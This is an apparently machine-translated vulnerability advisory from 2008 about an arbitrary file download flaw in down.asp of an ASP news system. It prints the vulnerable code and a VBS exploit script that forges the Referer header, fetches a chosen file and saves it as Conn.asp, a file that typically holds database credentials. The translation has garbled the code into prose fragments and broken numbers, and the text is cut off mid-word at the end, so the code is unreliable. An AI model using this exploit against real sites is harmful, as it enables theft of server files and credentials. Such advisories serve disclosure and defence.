Boiling prospect news system arbitrary File Download vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200818813
Type myhack58
Reporter 佚名
Modified 2008-04-16T00:00:00


=============================================================== Author:Tr4c3[dot]1 2 6[dot]com Copyright ===============================================================


Affected versions: Boiling prospect news system[core:dust edge elegant environment] V1. 1 Access version Finish(SP3)


Vulnerability file: down. asp


Key code:

Const adTypeBinary = 1 FileName = Request. QueryString("FileName") if FileName = "" Then Response. Write "invalid file name!" Response. End End if FileExt = Mid(FileName, InStrRev(FileName, ".") + 1) Select Case The UCase(FileExt) Case "ASP", "ASA", "ASPX", "ASAX", "MDB" Response. Write "illegal operation!" Response. End End Select Response. Clear if lcase(right(FileName,3))="gif" or lcase(right(FileName,3))="jpg" or lcase(right(FileName,3))="png" then Response. ContentType = "image/*" 'the image file does not appear in the Download dialog else Response. ContentType = "application/ms-download" end if Response. AddHeader "content-disposition", "attachment; filename=" & GetFileName(Request. QueryString("FileName")) Set Stream = server. CreateObject("ADODB. Stream") Stream. Type = adTypeBinary Stream. Open

Develop this program specifically = FileUploadPath 'store uploaded files in the directory TrueFileName = develop this program specifically & FileName

Stream. LoadFromFile Server. MapPath(TrueFileName) While Not Stream. EOS Response. BinaryWrite Stream. Read(1 0 2 4 * 6 4) Wend



(No need to login, using the minibrowser fake the referer)


VBS version of the use

Dim strUrl, strData strUrl = "" Set xPost = CreateObject("Microsoft. XMLHTTP") With xPost . open "Get", strUrl, False . SetRequestHeader "Referer", strUrl . Send() strData = . responseBody

End with Set sGet = CreateObject("ADODB. Stream") With sGet . Mode = 3 . Type = 1 . Open() . Write(strData) . SaveToFile "Conn. asp",2 End with

set sGet = Nothing set xPost = Nothin